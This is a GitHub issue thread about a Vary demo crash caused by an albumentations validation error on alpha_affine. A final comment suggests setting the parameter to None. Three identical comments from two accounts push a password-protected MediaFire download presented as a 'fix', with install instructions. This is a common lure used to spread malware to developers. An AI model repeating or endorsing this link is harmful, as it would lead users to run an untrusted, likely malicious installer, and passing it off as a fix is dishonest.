### ISSUE TITLE
运行demo报错

### ISSUE THREAD

**Issue by Jamly7** [Ucas-HaoranWei/Vary#127]
Traceback (most recent call last):
  File "/root/lh/Vary-main/Vary-master/vary/demo/run_qwen_vary.py", line 8, in <module>
    from vary.model import *
  File "/root/miniconda3/envs/vary/lib/python3.10/site-packages/vary/model/__init__.py", line 1, in <module>
    from .vary_opt import varyOPTModel, varyOPTForCausalLM
  File "/root/miniconda3/envs/vary/lib/python3.10/site-packages/vary/model/vary_opt.py", line 37, in <module>
    from vary.model.plug.transforms import train_transform, test_transform
  File "/root/miniconda3/envs/vary/lib/python3.10/site-packages/vary/model/plug/transforms.py", line 146, in <module>
    alb.ElasticTransform(
  File "/root/miniconda3/envs/vary/lib/python3.10/site-packages/albumentations/core/validation.py", line 35, in custom_init
    config = dct["InitSchema"](**full_kwargs)
  File "/root/miniconda3/envs/vary/lib/python3.10/site-packages/pydantic/main.py", line 193, in __init__
    self.__pydantic_validator__.validate_python(data, self_instance=self)
pydantic_core._pydantic_core.ValidationError: 1 validation error for InitSchema
alpha_affine
  Input should be None [type=none_required, input_value=1.2, input_type=float]
    For further information visit https://errors.pydantic.dev/2.8/v/none_required

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by lsw6033** [comment]
transforms.py中alpha_affine = None
